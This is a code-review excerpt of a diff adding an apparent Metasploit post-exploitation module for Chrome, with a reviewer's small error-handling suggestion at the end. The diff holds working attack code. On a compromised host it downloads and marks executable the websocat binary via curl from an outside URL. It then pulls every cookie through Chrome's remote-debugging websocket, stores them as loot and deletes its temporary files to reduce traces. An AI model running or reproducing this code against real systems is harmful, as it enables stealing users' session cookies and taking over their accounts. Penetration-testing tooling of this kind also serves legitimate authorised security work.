modules/post/chrome/gather/cookies.rb

```diff
@@ -0,0 +1,176 @@
+    websocket_url = JSON.parse(response)[0]['webSocketDebuggerUrl']
+    vprint_status("Found webSocketDebuggerUrl #{websocket_url}")
+    websocket_url
+  end
+
+  def download_websocat
+    if Pathname.new(@websocat_storage_path).exist?
+      print_status "websocat binary already exists at #{@websocat_storage_path}, skipping download"
+      return
+    end
+
+    url = WEBSOCAT_URL + @websocat_url_suffix
+    print_warning "Writing websocat binary to #{@websocat_storage_path} temporarily"
+    print_status "Downloading #{url} to #{@websocat_storage_path}"
+    cmd_exec "curl -L #{url} > #{@websocat_storage_path}"
+    cmd_exec "chmod +x #{@websocat_storage_path}"
+    vprint_status 'Download complete'
+
+    # Sleep here because there's sometimes a race condition ("file busy") between the binary being downloaded and executed.
+    sleep 5.seconds
+  end
+
+  def cleanup_websocat
+    cmd_exec "rm #{@websocat_storage_path}"
+    print_status "Deleted #{@websocat_storage_path}"
+    cmd_exec "rm #{@cookie_storage_path}"
+    print_status "Deleted #{@cookie_storage_path}"
+  end
+
+  def get_cookies(ws_url)
+
+    download_websocat
+
+    begin
+      # Redirect to a file because websocat streams the data, and can't send cookies larger than 65535 bytes in one message.
+      # This breaks cmd_exec, which cuts off the data partway. We're already writing to disk anyway, so I sure hope this is a good enough opsec tradeoff.
+      print_warning "Writing cookies to #{@cookie_storage_path} temporarily"
+      cmd = "echo '#{GET_ALL_COOKIES_REQUEST}' | #{@websocat_storage_path} -q #{ws_url} > #{@cookie_storage_path}"
+      errors = cmd_exec cmd
+
+      unless errors.empty?
+        print_bad "Error running #{cmd}"
+        print_error errors
+      end
+
+      cookies = File.read "#{@cookie_storage_path}"
+
+      # The websocket debugger URL is sometimes flaky, for whatever reason, so
+      # retry a few times.
+      if cookies.empty?
+        raise "No data read from websocket debugger url #{ws_url}"
+      end
+
+      # The cookies might be split into more than one message, delimited by '\n'. Remove them if so.
+      cookies = cookies.delete "\n"
+
+      result = JSON.parse cookies
+      cookies = result['result']['cookies']
+      print_good "Read #{cookies.length} cookies from #{ws_url}"
+    rescue RuntimeError
+      raise "Could not read any data from websocket debugger url #{ws_url}" if @retries.zero?
+
+      print_bad "No data read from websocket debugger url #{ws_url}. Retrying... (Retries left: #{@retries -= 1})"
+      sleep 5.seconds
+      retry
+    end
+
+    cleanup_websocat
+
+    cookies
+  end
+
+  def save(msg, data, ctype = 'text/json')
+    ltype = 'chrome.gather.cookies'
+    loot = store_loot ltype, ctype, session, data, nil, msg
+    print_good "#{msg} stored in #{loot}"
+  end
+
+  def run
+    print_error 'No session found, giving up' if session.nil?
```

Comment:
Consider returning; or better yet, use `fail_with`:

```suggestion
    fail_with Failure::BadConfig, 'No session found, giving up' if session.nil?
```